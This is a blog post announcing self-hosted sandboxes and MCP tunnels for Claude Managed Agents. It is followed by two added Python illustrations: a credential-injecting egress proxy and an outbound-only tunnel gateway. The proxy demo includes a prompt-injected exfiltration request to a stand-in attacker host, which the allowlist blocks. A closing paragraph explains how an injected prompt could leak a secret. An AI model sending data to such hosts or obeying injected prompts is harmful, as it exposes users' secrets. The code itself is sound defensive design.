Claude Blog · May 19, 2026 · 572 words · about 3 minutes

New in Claude Managed Agents: self-hosted sandboxes and MCP tunnels

Starting today, Claude Managed Agents can operate in a sandbox you control and connect to your private Model Context Protocol (MCP) servers. Both the sandbox where an agent executes tools and the services it reaches run within the established boundaries of your enterprise, under your security and runtime controls. The sandbox runs on your own infrastructure, or with managed providers like Cloudflare, Daytona, Modal, or Vercel to handle the compute and isolation for you. On the Claude Platform, self-hosted sandboxes are available in public beta and MCP tunnels are in research preview (request access).

Keep agent execution within your perimeter

With self-hosted sandboxes, you keep sensitive files, packages, and services in your own infrastructure or with a managed sandbox provider. The agent loop that handles orchestration, context management, and error recovery stays on Anthropic's infrastructure, while tool execution moves to the environment you configure. Inside your perimeter, network policies, audit logging, and security tooling are already in place, and files and repositories don't leave. You also control the compute: resource sizing and the runtime image are set on your side, so agents running compute-heavy work such as long builds or image generation get the CPU, memory, and capacity the task needs.

Choose your sandbox client

Bring any sandbox client you want, or start with one of our supported providers:

Cloudflare runs sandboxes at scale using microVMs and lighter-weight isolates. Outbound network requests are in your control, with zero-trust secrets injection, customizable proxies to audit, reroute, or modify egress, and the ability to connect to internal services over Cloudflare's network. Amplitude is building Design Agent, an internal tool for on-brand production UI and marketing design, on Managed Agents and Cloudflare for tighter observability and control.

Daytona sandboxes are full composable computers, long-running and stateful. The same primitive runs a quick burst or an agent that works for hours. The sandbox stays accessible while a session runs, over SSH or an authenticated preview URL, or can be paused and restored with full state preserved. Clay's GTM engineering agent, Sculptor, builds, tests, and monitors workflows autonomously on Managed Agents and Daytona.

Modal is a cloud platform built for AI workloads, where sandboxes share the same foundation as Modal's functions, storage, and networking primitives, giving you everything you need to build production AI systems. Modal's custom container runtime delivers sub-second startup on any image, scales to hundreds of thousands of concurrent sandboxes, and gives you CPU and GPU resources on demand.

Vercel sandboxes combine VM security, VPC peering, and bring-your-own-cloud with millisecond startup time. Managed Agents handles the model, tools, and session state, while the Vercel Sandbox firewall injects credentials at the network boundary so they never enter the sandbox. Rogo, an AI platform for institutional finance, is building an analyst agent on Managed Agents and Vercel Sandbox to handle their proprietary data securely.

Connect to services within your private network

With MCP tunnels, your agents reach MCP servers inside your private network without exposing them to the public internet. Internal databases, private APIs, knowledge bases, and ticketing systems become tools your agents can call. A lightweight gateway you deploy makes a single outbound connection: no inbound firewall rules, no public endpoints, and traffic encrypted end to end. MCP tunnels are supported in Managed Agents and the Messages API, and are managed by organization admins from workspace settings in the Claude Console.
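The egress property that the Cloudflare and Vercel descriptions above rely on (secrets injected at the network boundary, so the sandbox itself never holds them) is easier to reason about with a concrete boundary. The following Python is an added illustration written for this page, not Cloudflare, Vercel or Anthropic code: the host allowlist, the placeholder name, the sample secret and the request shapes are all constructed for the example.

```python
"""Credential injection at the sandbox's network boundary (added illustration,
not provider code). The sandbox only ever holds a placeholder; the boundary
proxy, which runs outside the sandbox, holds the real secret and attaches it
to allowlisted hosts only."""
from dataclasses import dataclass, field
from typing import Dict, Optional
from urllib.parse import urlsplit

PLACEHOLDER = "$INTERNAL_API_TOKEN"             # assumed marker the sandbox uses
REAL_SECRET = "Bearer real-api-token-0xC0FFEE"  # constructed sample secret

# Constructed boundary policy: which hosts the sandbox may reach and which
# credential, if any, the boundary attaches on the way out. The sandbox never
# sees this table.
EGRESS_POLICY: Dict[str, Dict[str, str]] = {
    "api.internal.example": {"header": "Authorization", "secret": REAL_SECRET},
    "pypi.org": {},  # reachable for package installs, no credential attached
}


@dataclass
class Request:
    url: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


class EgressDenied(Exception):
    """Raised when the boundary refuses to forward a request."""


def sandbox_environment() -> Dict[str, str]:
    """What the agent sees inside the sandbox: a placeholder, never the secret."""
    return {"INTERNAL_API_TOKEN": PLACEHOLDER}


def boundary_proxy(req: Request, policy: Optional[Dict[str, Dict[str, str]]] = None) -> Request:
    """Enforce the egress policy and inject credentials at the boundary.

    Denies hosts off the allowlist and plaintext schemes, drops any credential
    header the sandbox tried to set itself, and expands the placeholder only in
    the configured header of the configured host (never in bodies or URLs)."""
    policy = EGRESS_POLICY if policy is None else policy
    parts = urlsplit(req.url)
    host = (parts.hostname or "").lower()
    if parts.scheme != "https":
        raise EgressDenied(f"plaintext egress to {host!r} refused")
    if host not in policy:
        raise EgressDenied(f"{host!r} is not on the egress allowlist")
    rule = policy[host]
    cred_header = rule.get("header", "Authorization").lower()
    # Only the boundary decides what goes in the credential header.
    headers = {k: v for k, v in req.headers.items() if k.lower() != cred_header}
    if "secret" in rule:
        headers[rule["header"]] = rule["secret"]
    return Request(req.url, headers, req.body)


def secret_in_request(req: Request) -> bool:
    """True if the real secret appears anywhere in the given request."""
    blob = req.url + " ".join(f"{k}:{v}" for k, v in req.headers.items()) + req.body
    return REAL_SECRET in blob


def demo() -> Dict[str, object]:
    """Three requests an agent might make, and what the boundary does with them."""
    # 1. Legitimate call: the sandbox sends the placeholder, the boundary swaps
    #    in the real credential. The agent-side request never contains it.
    agent_req = Request("https://api.internal.example/v1/tickets",
                        headers={"Authorization": PLACEHOLDER})
    egress_req = boundary_proxy(agent_req)
    # 2. Prompt-injected exfiltration attempt: refused at the boundary, and the
    #    body would only have carried the placeholder anyway.
    try:
        boundary_proxy(Request("https://attacker.example/collect", body=PLACEHOLDER))
        exfil = "forwarded"
    except EgressDenied as exc:
        exfil = str(exc)
    # 3. Allowed host without a credential: nothing is injected, the placeholder
    #    is not expanded, and a forged Authorization header is dropped.
    pkg = boundary_proxy(Request("https://pypi.org/simple/requests/",
                                 headers={"Authorization": "Bearer forged"},
                                 body=PLACEHOLDER))
    return {
        "injected": egress_req.headers.get("Authorization"),
        "agent_side_clean": not secret_in_request(agent_req),
        "egress_side_has_secret": secret_in_request(egress_req),
        "exfil": exfil,
        "pkg_headers": pkg.headers,
        "pkg_body": pkg.body,
        "sandbox_env_clean": REAL_SECRET not in sandbox_environment().values(),
    }
```

The design choice worth noting is that the proxy strips the credential header before injecting: if the sandbox could set it, a compromised agent could forge credentials for an allowlisted host, and if the placeholder were expanded anywhere in the request, an injected prompt could move the secret into a body destined for any host the policy permits.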
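The tunnel architecture in the previous paragraph, as an added Python example (not Anthropic's gateway, protocol or code): a gateway inside the perimeter that only ever connects outward, a relay on the public side that only ever accepts that one connection, and requests forwarded back over it to a stand-in private MCP server. The newline-delimited JSON framing, the registration message and token, and the tool names are assumptions made for the example; the TLS that gives the real tunnel its end-to-end encryption is omitted so the code runs on localhost without certificates.

```python
"""Outbound-only tunnel to a private MCP server (added illustration, not
Anthropic's gateway or protocol). Framing, registration message and token
are assumptions; a real deployment runs this over TLS."""
import json
import socket
import threading
from typing import List, Optional

GATEWAY_TOKEN = "gateway-token-example"          # constructed registration token
PRIVATE_TOOLS = ["tickets.lookup", "kb.search"]  # constructed sample tool names


def private_mcp_server(request: dict) -> dict:
    """Stand-in for an MCP server on the private network. It is reached only
    through the gateway and never binds a listening socket of its own."""
    if request.get("method") == "tools/list":
        return {"id": request["id"], "result": {"tools": PRIVATE_TOOLS}}
    return {"id": request["id"], "error": f"unknown method {request.get('method')!r}"}


def _send(sock: socket.socket, msg: dict) -> None:
    sock.sendall(json.dumps(msg).encode() + b"\n")


def _recv(reader) -> Optional[dict]:
    line = reader.readline()
    return json.loads(line) if line else None


def run_gateway(relay_addr, served: List[str]) -> None:
    """The gateway you deploy inside the perimeter: one outbound connection,
    then it answers whatever the relay forwards. No bind(), no listen(), so
    no inbound firewall rule or public endpoint is needed."""
    with socket.create_connection(relay_addr) as conn:
        reader = conn.makefile("rb")
        _send(conn, {"role": "gateway", "auth": GATEWAY_TOKEN})
        while (req := _recv(reader)) is not None:
            served.append(req["method"])
            _send(conn, private_mcp_server(req))
        reader.close()


class Relay:
    """Public-side endpoint used by the agent runtime. The only connection it
    accepts from the private network is the gateway's outbound one."""

    def __init__(self) -> None:
        self._srv = socket.socket()
        self._srv.bind(("127.0.0.1", 0))
        self._srv.listen(1)
        self.addr = self._srv.getsockname()
        self._gw: Optional[socket.socket] = None
        self._reader = None
        self._lock = threading.Lock()
        self._next_id = 0

    def accept_gateway(self, expected_token: str) -> None:
        """Register the gateway; anything that cannot present the token is dropped."""
        conn, _ = self._srv.accept()
        reader = conn.makefile("rb")
        hello = _recv(reader)
        if not hello or hello.get("role") != "gateway" or hello.get("auth") != expected_token:
            reader.close()
            conn.close()
            raise PermissionError("gateway registration rejected")
        self._gw, self._reader = conn, reader

    def call(self, method: str, params: Optional[dict] = None) -> dict:
        """Forward one MCP-style request over the tunnel and wait for its reply."""
        with self._lock:
            self._next_id += 1
            req = {"id": self._next_id, "method": method, "params": params or {}}
            _send(self._gw, req)
            resp = _recv(self._reader)
        if resp is None or resp.get("id") != req["id"]:
            raise ConnectionError("tunnel closed or response id mismatch")
        return resp

    def close(self) -> None:
        if self._gw is not None:
            self._reader.close()
            self._gw.close()
        self._srv.close()


def demo() -> dict:
    """Bring up relay and gateway on localhost and call the private server twice."""
    relay, served = Relay(), []
    gw = threading.Thread(target=run_gateway, args=(relay.addr, served), daemon=True)
    gw.start()
    relay.accept_gateway(GATEWAY_TOKEN)
    try:
        tools = relay.call("tools/list")["result"]["tools"]
        err = relay.call("tools/call", {"name": "kb.search"}).get("error")
    finally:
        relay.close()
        gw.join(5)
    return {"tools": tools, "error": err, "served": served}


def rejected_registration() -> bool:
    """A peer that cannot present the gateway token is dropped at registration."""
    relay = Relay()

    def impostor() -> None:
        with socket.create_connection(relay.addr) as c:
            _send(c, {"role": "gateway", "auth": "wrong"})
            c.makefile("rb").readline()  # returns b"" once the relay hangs up

    t = threading.Thread(target=impostor, daemon=True)
    t.start()
    try:
        relay.accept_gateway(GATEWAY_TOKEN)
        return False
    except PermissionError:
        return True
    finally:
        relay.close()
        t.join(5)
```

Run `demo()` to see the round trip; the thing to check in any real gateway is the same as here: the private side calls only `connect()`, never `bind()` or `listen()`, so the firewall needs no inbound rule, and the relay authenticates the gateway before it will forward anything over the connection.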
Original: https://claude.com/blog/claude-managed-agents-updates